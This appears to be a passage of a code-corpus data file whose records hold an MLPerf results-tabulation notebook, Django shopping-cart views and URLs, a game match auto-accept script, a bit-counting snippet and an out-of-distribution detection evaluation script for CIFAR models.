loadgen_scenario_str ))\n continue\n if scenario_str == \"SingleStream\":\n if re.match(\"90th percentile latency\", line):\n score = line.split(\": \",1)[1].strip()\n continue\n if scenario_str == \"MultiStream\":\n if re.match(\"Samples per query\", line):\n score = line.split(\": \",1)[1].strip()\n continue\n if scenario_str == \"Server\":\n if re.match(\"Scheduled samples per second\", line):\n score = line.split(\": \",1)[1].strip()\n continue\n if scenario_str == \"Offline\":\n if re.match(\"Samples per second\", line):\n score = line.split(\": \",1)[1].strip()\n continue\n if scenario_str == 'SingleStream':\n time_ns = int(score)\n time_ms = time_ns * 1e-6\n elif scenario_str == 'MultiStream':\n num_streams = int(score)\n elif scenario_str == 'Server':\n queries_per_second = float(score)\n elif scenario_str == 'Offline':\n samples_per_second = float(score)\n else:\n raise Exception(\"Unsupported scenario '%s'!\" % scenario_str)\n\n # Tasks.\n if mode == 'spreadsheet': \n ic1 = (task=='IC' and benchmark.startswith('mobilenet'))\n ic2 = (task=='IC' and benchmark.startswith('resnet'))\n od1 = (task=='OD' and benchmark=='ssd-small')\n od2 = (task=='OD' and (benchmark=='ssd-large' or system_id=='velociti'))\n nmt = (task=='MT')\n else:\n ic1 = (task=='IC')\n ic2 = False\n od1 = (task=='OD')\n od2 = False\n nmt = (task=='MT')\n if scenario_str == 'SingleStream':\n performance_str = '{:.03f}'.format(time_ms)\n accuracy_str = '{:.03f}'.format(accuracy)\n if ic1:\n data[0]['A_IC1_SS'] = accuracy_str\n data[0]['P_IC1_SS'] = performance_str\n elif ic2:\n data[0]['A_IC2_SS'] = accuracy_str\n data[0]['P_IC2_SS'] = performance_str\n elif od1:\n data[0]['A_OD1_SS'] = accuracy_str\n data[0]['P_OD1_SS'] = performance_str\n elif od2:\n data[0]['A_OD2_SS'] = accuracy_str\n data[0]['P_OD2_SS'] = performance_str\n elif nmt:\n data[0]['A_NMT_SS'] = accuracy_str\n data[0]['P_NMT_SS'] = performance_str\n elif scenario_str == 'MultiStream':\n performance_str = '{:d}'.format(num_streams)\n accuracy_str = '{:.03f}'.format(accuracy)\n if ic1:\n data[0]['A_IC1_MS'] = accuracy_str\n data[0]['P_IC1_MS'] = performance_str\n elif ic2:\n data[0]['A_IC2_MS'] = accuracy_str\n data[0]['P_IC2_MS'] = performance_str\n elif od1:\n data[0]['A_OD1_MS'] = accuracy_str\n data[0]['P_OD1_MS'] = performance_str\n elif od2:\n data[0]['A_OD2_MS'] = accuracy_str\n data[0]['P_OD2_MS'] = performance_str\n elif nmt:\n data[0]['A_NMT_MS'] = accuracy_str\n data[0]['P_NMT_MS'] = performance_str\n elif scenario_str == 'Server':\n performance_str = '{:.03f}'.format(queries_per_second)\n accuracy_str = '{:.03f}'.format(accuracy)\n if ic1:\n data[0]['A_IC1_S'] = accuracy_str\n data[0]['P_IC1_S'] = performance_str\n elif ic2:\n data[0]['A_IC2_S'] = accuracy_str\n data[0]['P_IC2_S'] = performance_str\n elif od1:\n data[0]['A_OD1_S'] = accuracy_str\n data[0]['P_OD1_S'] = performance_str\n elif od2:\n data[0]['A_OD2_S'] = accuracy_str\n data[0]['P_OD2_S'] = performance_str\n elif nmt:\n data[0]['A_NMT_S'] = accuracy_str\n data[0]['P_NMT_S'] = performance_str \n elif scenario_str == 'Offline':\n performance_str = '{:.03f}'.format(samples_per_second)\n accuracy_str = '{:.03f}'.format(accuracy)\n if ic1:\n data[0]['A_IC1_O'] = accuracy_str\n data[0]['P_IC1_O'] = performance_str\n elif ic2:\n data[0]['A_IC2_O'] = accuracy_str\n data[0]['P_IC2_O'] = performance_str\n elif od1:\n data[0]['A_OD1_O'] = accuracy_str\n data[0]['P_OD1_O'] = performance_str\n elif od2:\n data[0]['A_OD2_O'] = accuracy_str\n data[0]['P_OD2_O'] = performance_str\n elif nmt:\n data[0]['A_NMT_O'] = accuracy_str\n data[0]['P_NMT_O'] = performance_str\n else:\n print('Skipping unsupported task/scenario combination!')\n continue\n if mode != 'spreadsheet':\n df = pd.DataFrame(data)\n df = df.set_index(index)\n dfs.append(df)\n # END OF FOR EACH scenario\n if mode == 'spreadsheet':\n # For closed, multiple benchmarks can share the same row, so the Benchmark field can be misleading.\n if division == 'closed': data[0]['Benchmark'] = ''\n if is_last_benchmark or (division == 'open' and submitter == 'dividiti'):\n df = pd.DataFrame(data)\n df = df.set_index(index)\n dfs.append(df)\n # For the spreadsheet mode, include multiple benchmarks per row.\n # END OF FOR EACH benchmark\n # END OF FOR EACH system\n # END OF FOR EACH submitter\n # END OF FOR EACH division\n \n # Concatenate all thus constructed DataFrames (i.e. stack on top of each other).\n df = pd.concat(dfs)\n # Temporarily capitalize the first letter in 'dividiti' for correct sorting and then back.\n df = df .rename(index={'dividiti':'Dividiti', 'dividiti + PoliMi':'Dividiti + PoliMi'}) .sort_index(ascending=True) .rename(index={'Dividiti':'dividiti', 'Dividiti + PoliMi':'dividiti + PoliMi'}) \n # Reset the index, but keep Division and Category there.\n df = df.reset_index(level=index[2:])\n df['ID'] = [ 'Inf-0.5-{:03d}'.format(ID) for ID in range(1, len(df)+1) ]\n # Mimic the official template.\n columns = [ 'ID', 'Submitter', 'System', 'Benchmark' ]\n columns += score_columns\n columns += [ 'Processor', 'Processor #', 'Accelerator', 'Accelerator #', 'Software',\n 'FF_M', 'FF_D', 'FF_S', 'FF_E', 'Details', 'Code', 'Notes' ]\n # Finalize the table.\n if mode == 'spreadsheet':\n df = df[columns]\n else:\n df = df.reset_index().set_index(keys=[ 'ID', 'Division', 'Category', 'Submitter', 'System', 'Benchmark' ], drop=False)\n df[score_columns] = df[score_columns].apply(pd.to_numeric).astype('float32')\n \n return df\n\n\n# In[ ]:\n\n\ndf = get_data(results_path=results_path, mode='spreadsheet')\ndisplay_in_full(df)\n\n\n# ## Dump the table for the CK dashboard\n\n# In[ ]:\n\n\ncache_path\n\n\n# In[ ]:\n\n\n# Always clean the cache while in the development mode.\nget_ipython().system('rm -f $cache_path')\n\n\n# In[ ]:\n\n\nresults_path\n\n\n# In[ ]:\n\n\nif os.path.exists(cache_path):\n # Load the table from cache.\n print('Loading the results table from cache ...')\n df = pd.read_pickle(cache)\nelse:\n # Store the table in a simplified format.\n print('Storing the results table to cache ...')\n df = get_data(results_path=results_path, mode='dashboard')\n df.to_pickle(path=cache_path, protocol=cache_protocol, compression=cache_compression)\ndisplay_in_full(df)\n\n\n# ## Dump the table into Excel (with separate sheets for Division / Category)\n\n# In[ ]:\n\n\n# Create a Pandas Excel writer using XlsxWriter as the engine.\nfrom pandas import ExcelWriter\n# NB: Cannot use dot for 'v0.5', as otherwise the engine complains about an unknown extension.\nxlsx_filename = 'MLPerf Inference v0_5 - Results (Automatically Generated).xlsx'\nxlsx_writer = ExcelWriter(xlsx_filename, engine='xlsxwriter', options={'strings_to_urls': True})\ndf_ = df.droplevel('ID')\nfor division in df.index.unique(level='Division'):\n df_d = df_.loc[division]\n for category in df_d.index.unique(level='Category'):\n df_dc = df_d.loc[category]\n if division == 'Open':\n df_xlsx = df_dc\n elif division == 'Closed':\n df_xlsx = df_dc.drop(labels=['Benchmark']+accuracy_columns, axis=1)\n else:\n continue\n # Write different division and category results to separate sheets. Omit index.\n print('*' * 100)\n print('* Division / Category: %s / %s' % (division, category))\n print('*' * 100)\n if category == 'Research, Development, Other': category = 'RDO' # NB: sheet_name must be =< 31 symbols.\n df_xlsx.to_excel(xlsx_writer, sheet_name='{} - {}'.format(division, category), index=False)\n display_in_full(df_xlsx)\n print('')\nxlsx_writer.save()\nget_ipython().system('cp \"$xlsx_filename\" ~/Downloads')\n\n\n# ## Statistics\n\n# ### Total number of results\n\n# In[ ]:\n\n\n# Performance columns are strings for formatting reasons. Convert the strings to numbers (with NaNs for empty strings),\n# then count the numbers across the columns and finally sum.\nprint(\"#Results: %d\" % df[performance_columns].apply(pd.to_numeric).count(numeric_only=True, axis=0).sum())\n#print(\"#Results/Closed: %d\" % df.loc['Closed'][performance_columns].apply(pd.to_numeric).count(numeric_only=True, axis=0).sum())\n#print(\"#Results/Open: %d\" % df.loc['Open'][performance_columns].apply(pd.to_numeric).count(numeric_only=True, axis=0).sum())\n\n\n# ### Number of results per division per submitter per benchmark\n\n# In[ ]:\n\n\n# indices = [ 'Division', 'Submitter' ]\n# df_num_results_per_division_per_submitter_per_benchmark = df \\\n# .reset_index() \\\n# [indices + performance_columns] \\\n# .set_index(indices) \\\n# .apply(pd.to_numeric) \\\n# .groupby(level=indices).count()\n# display_in_full(df_num_results_per_division_per_submitter_per_benchmark)\n\n\n# In[ ]:\n\n\n# df_num_results_per_division_per_submitter = df_num_results_per_division_per_submitter_per_benchmark.sum(axis=1)\n# df_num_results_per_division_per_submitter\n\n\n# ### Pie charts\n\n# In[ ]:\n\n\n# def plot_num_results(df_num_results_per_submitter, autopct='%1.0f%%', pctdistance=0.8, labeldistance=1.1, topN=5,\n# explode_submitters=['dividiti'], explode_distance=0.05, startangle=0, shadow=False,\n# title='MLPerf Inference v0.5 - Results per Submitter', fname=None, ftype='jpg', color = 'darkgray'):\n\n# df_num_results_per_submitter_descending = pd.DataFrame({\n# 'Submitter' : df_num_results_per_submitter.index,\n# '#Results' : df_num_results_per_submitter.values}) \\\n# .sort_values('#Results', ascending=False)\n\n# df_num_results_per_submitter_topN = df_num_results_per_submitter_descending[:topN].copy()\n\n# df_num_results_per_submitter_others = pd.DataFrame(data = {\n# 'Submitter' : ['Others'],\n# '#Results' : [df_num_results_per_submitter_descending['#Results'][topN:].sum()]})\n\n# df_num_results_per_submitter_topN_and_others = \\\n# pd.concat([df_num_results_per_submitter_topN, df_num_results_per_submitter_others]) \\\n# .set_index('Submitter') \\\n# .sort_values('Submitter', ascending=False)\n\n# results = df_num_results_per_submitter_topN_and_others['#Results']\n# submitters = df_num_results_per_submitter_topN_and_others.index\n# explode = [ explode_distance if submitter in explode_submitters else 0 for submitter in submitters ]\n\n# mp.rcParams['figure.dpi'] = default_dpi\n# plt.pie(results, labels=submitters, autopct=autopct,\n# pctdistance=pctdistance, labeldistance=labeldistance,\n# explode=explode, startangle=35, shadow=shadow)\n \n# plt.title(title)\n# plt.tight_layout()\n# if fname is not None:\n# # A lazy way to use the default file name.\n# if fname == '': fname = '{}.{}'.format(title, ftype) \n# plt.savefig(fname=fname, format=ftype, dpi=100, quality=90, optimize=True, bbox_inches='tight',\n# facecolor=color, edgecolor=color)\n# plt.show()\n\n\n# #### Plot by division\n\n# In[ ]:\n\n\n# for division, topN in zip([ 'Closed', 'Open' ], [ 10, 3 ]):\n# explode_submitters = [] if division == 'Open' else ['dividiti']\n# plot_num_results(\n# df_num_results_per_division_per_submitter.loc[division],\n# title='MLPerf Inference v0.5 - {} Division - Results per Submitter'.format(division),\n# topN=topN, explode_submitters=explode_submitters\n# )\n\n\n# #### Plot all\n\n# In[ ]:\n\n\n# plot_num_results(\n# df_num_results_per_division_per_submitter.droplevel('Division').groupby(level='Submitter').sum(),\n# topN=8, explode_submitters=['dividiti', 'dividiti + PoliMi'], fname='')\n\n\n# ## Display HTML with embedded links (TODO)\n\n# In[ ]:\n\n\n# df = df.set_index(['Submitter', 'System', 'Benchmark', 'Software'], append=True)\n# def link_code(url): return '<a target=\"_blank\" href=\"{}\">Code</a>'.format(url)\n# def link_details(url): return '<a target=\"_blank\" href=\"{}\">Details</a>'.format(url)\n# display_in_full(df.style.format({'Code': link_code, 'Details': link_details}))\n\n","repo_name":"ctuning/ck-mlperf","sub_path":"jnotebook/mlperf-inference-v0.5/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":38784,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"95"} +{"seq_id":"19356954793","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.http import require_POST, require_http_methods\nfrom main.models import Product\nfrom .cart import Cart\nfrom django.http import JsonResponse\n\n@require_POST\ndef cart_add(request, product_id):\n cart = Cart(request)\n data = {\n 'product_quantity': '',\n 'cart_length': '',\n }\n product = get_object_or_404(Product, id=product_id)\n quantity = request.POST.get('quantity')\n if quantity:\n cart.add(product=product,\n quantity=int(quantity))\n data['product_quantity'] = cart.get_product_quantity(product_id)\n \n else:\n cart.add(product=product)\n cart_length = cart.__len__()\n data['cart_length'] = cart_length \n return JsonResponse(data)\n\n@require_http_methods([\"DELETE\"])\ndef cart_remove(request, product_id):\n cart = Cart(request)\n data = {\n 'message': 'Товар успешно удален.',\n 'cart_length': '',\n }\n product = get_object_or_404(Product, id=product_id)\n cart.remove(product)\n cart_length = cart.__len__()\n data['cart_length'] = cart_length \n return JsonResponse(data)\n\n\ndef cart_detail(request):\n return render(request, 'cart_detail.html')","repo_name":"RudyIlya/SomeStore","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"15597997080","text":"import numpy as np\nimport cv2 as cv\n\nimport time\nimport mss\nimport os\n\nimport pydirectinput\n\n\nclass Watcher:\n def __init__(self) -> None:\n self.stc = mss.mss()\n\n path = os.path.dirname(__file__)\n self.img_path = os.path.join(path, \"accept.jpg\")\n\n def match_finder(self):\n img = self.screenshot()\n match_found = cv.imread(self.img_path)\n\n result_try = cv.matchTemplate(img, match_found, cv.TM_CCOEFF_NORMED)\n\n _, mVal, _, mLoc = cv.minMaxLoc(result_try)\n\n return mVal > .9, mLoc\n\n def screenshot(self, left=0, top=0, width=1920, height=1080):\n scr = self.stc.grab({\n 'left': left,\n 'top': top,\n 'width': width,\n 'height': height,\n })\n\n img = np.array(scr)\n img = cv.cvtColor(img, cv.IMREAD_COLOR)\n\n return img\n\n def click(self, x, y, wait=0):\n pydirectinput.moveTo(x, y)\n time.sleep(wait)\n pydirectinput.mouseDown()\n time.sleep(wait)\n pydirectinput.mouseUp()\n\n def watch(self):\n \"\"\"Busca si se encontro la partida y clickea el boton de aceptar\n \"\"\"\n found, mLoc = self.match_finder()\n x, y = mLoc\n if found:\n self.click(x, y)\n print(\"Partida aceptada!\")\n time.sleep(5)\n","repo_name":"calvi7/lol-auto-accepter","sub_path":"watcher.py","file_name":"watcher.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"25623008457","text":"from django.urls import path\nfrom UserApp import views\n\nurlpatterns = [\n path('homepage/', views.homepage, name=\"homepage\"),\n path('productpage/<catg>/', views.productpage, name=\"productpage\"),\n path('singleproduct/<int:dataid>/', views.singleproduct, name=\"singleproduct\"),\n path('savecart/', views.savecart, name=\"savecart\"),\n path('cartpage/', views.cartpage, name=\"cartpage\"),\n path('DeleteItem/<int:dataid>/', views.DeleteItem, name=\"DeleteItem\"),\n path('placeorder/', views.placeorder, name=\"placeorder\"),\n path('savecheck/', views.savecheck, name=\"savecheck\"),\n path('userloginpage/', views.userloginpage, name=\"userloginpage\"),\n path('saveuser/', views.saveuser, name=\"saveuser\"),\n path('userlogin/', views.userlogin, name=\"userlogin\"),\n path('Admin_Logout/', views.Admin_Logout, name=\"Admin_Logout\"),\n]\n","repo_name":"Kirankrishnakr/Frutika","sub_path":"UserApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"3756210892","text":"def countOnes(n):\n c = 0\n i = 0\n while i < 8:\n c += n & 1\n print(n&1, end = \" \") #gives the binary representation of n\n n >>= 1 # left shift by one\n\n\n i +=1\n\n print(\"\\nTotal number of one's is \", c)\n\ncountOnes(20)\n","repo_name":"bikash-das/pythonprograms","sub_path":"countOnes.py","file_name":"countOnes.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"22967593841","text":"from random import seed\nimport numpy as np\nimport os\nimport argparse\nimport torchvision\nimport torch\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nimport torchvision.transforms as trn\nimport torchvision.datasets as dset\nimport torch.nn.functional as F\nfrom models.wrn import WideResNet\nfrom models import ResNet \nfrom Utils.display_results import get_measures, print_measures, print_measures_with_std\nimport Utils.score_calculation as lib\n\nparser = argparse.ArgumentParser(description='Evaluates a CIFAR OOD Detector',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n# Setup\nparser.add_argument('--batch_size', type=int, default=128)\nparser.add_argument('--num_class', type=int, default=10)\nparser.add_argument('--num_to_avg', type=int, default=10, help='Average measures across num_to_avg runs.')\nparser.add_argument('--dataset', type=str, default='cifar10', help='dataset name.')\nparser.add_argument('--stored_data_path', type=str, default='/data/ood_detection/data/', help='the path for storing data.')\nparser.add_argument('--score', default='SHE', type=str, help='score options: MSP|Energy|ReAct|HE|SHE|SHE_react|SHE_with_perturbation')\nparser.add_argument('--parallel_list', type=str, default='0',help='give number if want parallel')\nparser.add_argument('--model', type=str, default='resnet18')\n\nparser.add_argument('--resize_val', default=112, type=int, help='transform resize length')\nparser.add_argument('--beita', default=0.01, type=float, help='for HE')\nparser.add_argument('--noise', type=float, default=0.0014, help='pertubation')\nparser.add_argument('--threshold', type=float, default=1.0)\nparser.add_argument('--T', default=1.0, type=float)\nparser.add_argument('--k', default=0.8, type=float)\nparser.add_argument('--metric', type=str, default='inner_product',help='ablation: choose which metric for the SHE')\n\n#parameters for wrn\nparser.add_argument('--layers', default=40, type=int, help='total number of layers')\nparser.add_argument('--widen-factor', default=2, type=int, help='widen factor')\nparser.add_argument('--droprate', default=0.3, type=float, help='dropout probability')\n\nparser.add_argument('--need_penultimate', default=4, type=int,help='choose which layer as the pattern')\n\nargs = parser.parse_args()\nprint(args)\n\nif args.model == 'wrn':\n args.resize_val = 64\nelse:\n args.resize_val = 112\n \nrandom_seed = 12\n\nargs.beita = 0.2 if args.model == 'wrn' else 0.01\n\nos.environ['CUDA_VISIBLE_DEVICES'] = args.parallel_list\ncudnn.benchmark = True\n\n# Set random seed\nseed(random_seed)\nnp.random.seed(random_seed)\ntorch.manual_seed(random_seed)\ntorch.cuda.manual_seed_all(random_seed)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\n\n\nmean = [0.4914, 0.4822, 0.4465]\nstd = [0.2023, 0.1994, 0.2010]\n\n\nprint('Size of sample is {}*{}'.format(args.resize_val,args.resize_val))\ntransform_all = trn.Compose([\n trn.Resize((args.resize_val,args.resize_val)),\n trn.ToTensor(),\n trn.Normalize(mean, std),\n])\n\n\n\n\nif args.dataset == 'cifar10':\n trainset = torchvision.datasets.CIFAR10(root=args.stored_data_path, train=True, download=True, transform=transform_all)\n train_loader = torch.utils.data.DataLoader(trainset, batch_size=args.batch_size, shuffle=True, num_workers=4)\n\n test_data = torchvision.datasets.CIFAR10(root=args.stored_data_path, train=False, download=True, transform=transform_all)\n test_loader = torch.utils.data.DataLoader(test_data, batch_size=args.batch_size, shuffle=False, num_workers=4)\n args.num_class = 10\nelif args.dataset == 'cifar100':\n trainset = torchvision.datasets.CIFAR100(root=args.stored_data_path, train=True, download=True, transform=transform_all)\n train_loader = torch.utils.data.DataLoader(trainset, batch_size=args.batch_size, shuffle=True, num_workers=4)\n\n test_data = torchvision.datasets.CIFAR100(root=args.stored_data_path, train=False, download=True, transform=transform_all)\n test_loader = torch.utils.data.DataLoader(test_data, batch_size=args.batch_size, shuffle=False, num_workers=4)\n args.num_class = 100\nelse:\n print('The dataset is not provided.')\n\nif args.model == 'resnet18':\n net = ResNet.ResNet18(num_classes=args.num_class)\nelif args.model == 'resnet34':\n net = ResNet.ResNet34(num_classes=args.num_class)\nelif args.model=='wrn':\n net = WideResNet(args.layers, args.num_class, args.widen_factor, dropRate=args.droprate)\n\n\n\n\nnet = nn.DataParallel(net).cuda()\nPATH = './checkpoints/{}/test_useresize_{}_size_{}.pth'.format(args.dataset,args.model,args.resize_val)\n\n\nnet.load_state_dict(torch.load(PATH,map_location=None))\nnet.eval()\n\n# ---------If you want to test the accuracy of this model, you can use the code below:------\n\n# def valid(model, valid_loader,numclass):\n# valid_loss = 0\n# correct = 0\n# with torch.no_grad():\n# for data, target in valid_loader:\n# data, target = data.cuda(), target.cuda()\n# model = model.cuda()\n# prediction,_ = model(data)\n# critetion = nn.CrossEntropyLoss()\n# loss = critetion(prediction,target)\n# valid_loss += loss.item()\n# pred = prediction.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n# correct += pred.eq(target.view_as(pred)).sum().item()\n# valid_loss /= len(valid_loader.dataset)\n# accuracy = 100. * correct / len(valid_loader.dataset)\n# return valid_loss, correct, accuracy\n\n# print('valid initialization')\n# valid_loss, valid_correct, valid_accuracy = valid(net, test_loader,args.num_class)\n# print('validing set: Average loss: {:.4f}, Accuracy: ({:.4f}%)'.format(valid_loss, valid_accuracy))\n\n\n# Used for the ReAct method\ndef get_threshold(p=0.9):\n tempres = []\n with torch.no_grad():\n for data, target in train_loader:\n data, target = data.cuda(), target.cuda()\n _,penultimate = net(data,need_penultimate=args.need_penultimate)\n for i in range(penultimate.size(0)):\n cur_feature = penultimate[i].detach().tolist()\n tempres.extend(cur_feature)\n tempres.sort()\n index = int(len(tempres)*p)\n threshold = tempres[index]\n return threshold\n\nif args.score == 'ReAct':\n args.threshold = get_threshold(p=0.9) \nelif args.score == 'SHE_react':\n args.threshold = get_threshold(p=0.95) \n\n\n# /////////////// Detection Prelims ///////////////\n\nood_num_examples = len(test_data) // 5\nexpected_ap = ood_num_examples / (ood_num_examples + len(test_data))\n\nconcat = lambda x: np.concatenate(x, axis=0)\nto_np = lambda x: x.data.cpu().numpy()\n\n\ndef get_ood_scores(loader, in_dist=False):\n _score = []\n with torch.no_grad():\n for batch_idx, (data, target) in enumerate(loader):\n if batch_idx >= ood_num_examples // args.batch_size and in_dist is False:\n break\n\n data = data.cuda()\n\n\n if args.score == 'SHE':\n output,penultimate = net(data,need_penultimate=args.need_penultimate)\n _score.extend(simple_compute_score_HE(prediction=output,penultimate=penultimate))\n elif args.score == 'SHE_react':\n output,penultimate = net(data,threshold=args.threshold,need_penultimate=args.need_penultimate)\n _score.extend(simple_compute_score_HE(prediction=output,penultimate=penultimate))\n elif args.score == 'HE':\n output,penultimate = net(data,need_penultimate=args.need_penultimate)\n _score.extend(compute_score_HE(prediction=output,penultimate=penultimate))\n elif args.score == 'MSP':\n output,penultimate = net(data,need_penultimate=args.need_penultimate)\n smax = to_np(F.softmax(output, dim=1))\n _score.append(-np.max(smax, axis=1))\n elif args.score == 'Energy':\n output,penultimate = net(data,need_penultimate=args.need_penultimate)\n _score.append(-to_np((args.T * torch.logsumexp(output / args.T, dim=1))))\n elif args.score == 'ReAct':\n output,penultimate = net(data,threshold=args.threshold)\n _score.append(-to_np((args.T * torch.logsumexp(output / args.T, dim=1))))\n if in_dist:\n return concat(_score).copy()\n else:\n return concat(_score)[:ood_num_examples].copy()\n\n\n\ndef compute_score_HE(prediction,penultimate):\n #----------------------------------------Step 1: classifier the test feature-----------------------------------\n numclass = args.num_class\n feature_list = [None for i in range(numclass)]\n pred = prediction.argmax(dim=1, keepdim=True)\n # get each class tensor\n for i in range(numclass):\n each_label_tensor = torch.tensor([i for _ in range(prediction.size(0))]).cuda()\n target_index = pred.eq(each_label_tensor.view_as(pred))\n\n # get the penultimate layer\n each_label_feature = penultimate[target_index.squeeze(1)]\n if each_label_feature is None: continue\n if feature_list[i] is None:\n feature_list[i] = each_label_feature\n else:\n feature_list[i] = torch.cat((feature_list[i],each_label_feature),dim=0)\n \n\n #----------------------------------------Step 2: get the stored pattern------------------------------------\n stored_feature_list = []\n for i in range(numclass):\n path = './stored_pattern/all_stored_pattern/size_{}/{}/{}/stored_all_class_{}.pth'.format(args.resize_val,args.dataset,args.model,i)\n stored_tensor = torch.load(path)\n stored_feature_list.append(stored_tensor) #Here we get all the stored pattestr(i) +'.pth'rns\n\n res = []\n #----------------------------------------Step 3: compute energy--------------------------------------------------------------------\n for i in range(numclass):\n\n test_feature = feature_list[i].transpose(0,1) #[dim,B_test]\n stored_feature = stored_feature_list[i] #[B_stored,dim]\n \n\n if test_feature is None: continue\n res_energy_score = torch.mm(stored_feature,test_feature) #[B_stored,B_test]\n lse_res = -to_np(torch.logsumexp(res_energy_score*args.beita, dim=0)) #[1,B_test]\n res.append(lse_res)\n return res \n\n\n\n\ndef simple_compute_score_HE(prediction,penultimate,need_mask=False):\n\n numclass = args.num_class\n #----------------------------------------Step 1: classifier the test feature-----------------------------------\n pred = prediction.argmax(dim=1, keepdim=False)\n pred = pred.cpu().tolist()\n \n #----------------------------------------Step 2: get the stored pattern------------------------------------\n\n total_stored_feature = None\n for i in range(numclass):\n path = './stored_pattern/avg_stored_pattern/size_{}/{}/{}/stored_avg_class_{}.pth'.format(args.resize_val,args.dataset,args.model,i)\n stored_tensor = torch.load(path)\n if total_stored_feature is None:\n total_stored_feature = stored_tensor\n else:\n total_stored_feature = torch.cat((total_stored_feature,stored_tensor),dim=0)\n #--------------------------------------------------------------------------------------\n\n target = total_stored_feature[pred,:]\n res = []\n\n # for ablation exp: different metric for SHE\n if args.metric == 'inner_product':\n res_energy_score = torch.sum(torch.mul(penultimate,target),dim=1) #inner product\n elif args.metric == 'euclidean_distance':\n res_energy_score = -torch.sqrt(torch.sum((penultimate-target)**2, dim=1))\n elif args.metric == 'cos_similarity':\n res_energy_score = torch.cosine_similarity(penultimate,target, dim=1)\n lse_res = -to_np(res_energy_score)\n res.append(lse_res)\n return res\n\n\n\n\n\n\n\nif args.score == 'SHE_with_perturbation':\n in_score = lib.get_ood_scores_perturbation(args,test_loader, net, args.batch_size, ood_num_examples, args.T, args.noise, in_dist=True)\nelse:\n in_score = get_ood_scores(test_loader, in_dist=True)\n\n\n# /////////////// OOD Detection ///////////////\n# auroc_list, aupr_list, fpr_list = [], [], []\n\ndef get_and_print_results(ood_loader, num_to_avg=args.num_to_avg):\n\n aurocs, auprs, fprs = [], [], []\n\n for _ in range(num_to_avg):\n if args.score == 'SHE_with_perturbation':\n out_score = lib.get_ood_scores_perturbation(args,ood_loader, net, args.batch_size, ood_num_examples, args.T, args.noise)\n else:\n out_score = get_ood_scores(ood_loader)\n measures = get_measures(-in_score, -out_score)\n aurocs.append(measures[0]); auprs.append(measures[1]); fprs.append(measures[2])\n\n\n auroc = np.mean(aurocs); aupr = np.mean(auprs); fpr = np.mean(fprs)\n\n if num_to_avg >= 5:\n print_measures_with_std(aurocs, auprs, fprs, method_name='method:{}\\tsize:{}\\tdataset:{}\\tmodel:{}'.format(args.score,args.resize_val,args.dataset,args.model))\n else:\n print_measures(auroc, aupr, fpr, method_name='method:{}_dataset:{}'.format(args.score,args.dataset))\n return 100*np.mean(fprs), 100*np.mean(aurocs)\n\n\n\n\nfprlist,auclist = [],[]\n# # # /////////////// SVHN /////////////// \nood_data = torchvision.datasets.SVHN(root=os.path.join(args.stored_data_path,'svhn'), split=\"test\",download=True,\n transform=transform_all)\nood_loader = torch.utils.data.DataLoader(ood_data, batch_size=args.batch_size, shuffle=True,\n num_workers=2, pin_memory=True)\nprint('\\n\\nSVHN Detection')\nfpr,auc = get_and_print_results(ood_loader)\nfprlist.append(fpr)\nauclist.append(auc)\n\n# # /////////////// LSUN-C ///////////////\nood_data = dset.ImageFolder(root=os.path.join(args.stored_data_path,'LSUN_C'),\n transform=transform_all)\nood_loader = torch.utils.data.DataLoader(ood_data, batch_size=args.batch_size, shuffle=True,\n num_workers=2, pin_memory=True)\nprint('\\n\\nLSUN_C Detection')\nfpr,auc = get_and_print_results(ood_loader)\nfprlist.append(fpr)\nauclist.append(auc)\n# # # /////////////// LSUN-R ///////////////\nood_data = dset.ImageFolder(os.path.join(args.stored_data_path,'LSUN_resize'),\n transform=transform_all)\nood_loader = torch.utils.data.DataLoader(ood_data, batch_size=args.batch_size, shuffle=True,\n num_workers=2, pin_memory=True)\nprint('\\n\\nLSUN_Resize Detection')\nfpr,auc = get_and_print_results(ood_loader)\nfprlist.append(fpr)\nauclist.append(auc)\n\n# # /////////////// iSUN ///////////////\nood_data = dset.ImageFolder(root=os.path.join(args.stored_data_path,'iSUN'),\n transform=transform_all)\nood_loader = torch.utils.data.DataLoader(ood_data, batch_size=args.batch_size, shuffle=True,\n num_workers=2, pin_memory=True)\nprint('\\n\\niSUN Detection')\nfpr,auc = get_and_print_results(ood_loader)\nfprlist.append(fpr)\nauclist.append(auc)\n\n# # /////////////// Places365 ///////////////\n\nood_data = dset.ImageFolder(root=os.path.join(args.stored_data_path,'Places'),\n transform=transform_all) \nood_loader = torch.utils.data.DataLoader(ood_data, batch_size=args.batch_size, shuffle=True,\n num_workers=2, pin_memory=True)\nprint('\\n\\nPlaces365 Detection')\nfpr,auc = get_and_print_results(ood_loader)\nfprlist.append(fpr)\nauclist.append(auc)\n\n\n\n\n# # /////////////// Textures ///////////////\n\nood_data = dset.ImageFolder(root=os.path.join(args.stored_data_path,'dtd/images'),\n transform=transform_all) \nood_loader = torch.utils.data.DataLoader(ood_data, batch_size=args.batch_size, shuffle=True,\n num_workers=2, pin_memory=True)\nprint('\\n\\nTexture Detection')\nfpr,auc = get_and_print_results(ood_loader)\nfprlist.append(fpr)\nauclist.append(auc)\n\n# # # /////////////// Tiny Imagenet /////////////// # cropped and no sampling of the test set\nood_data = dset.ImageFolder(root=os.path.join(args.stored_data_path,'Imagenet_resize'),\n transform=transform_all) \nood_loader = torch.utils.data.DataLoader(ood_data, batch_size=args.batch_size, shuffle=True,\n num_workers=2, pin_memory=True)\nprint('\\n\\nTiny Imagenet Detection')\nfpr,auc = get_and_print_results(ood_loader)\nfprlist.append(fpr)\nauclist.append(auc)\n\n# /////////////// SUN /////////////// # cropped and no sampling of 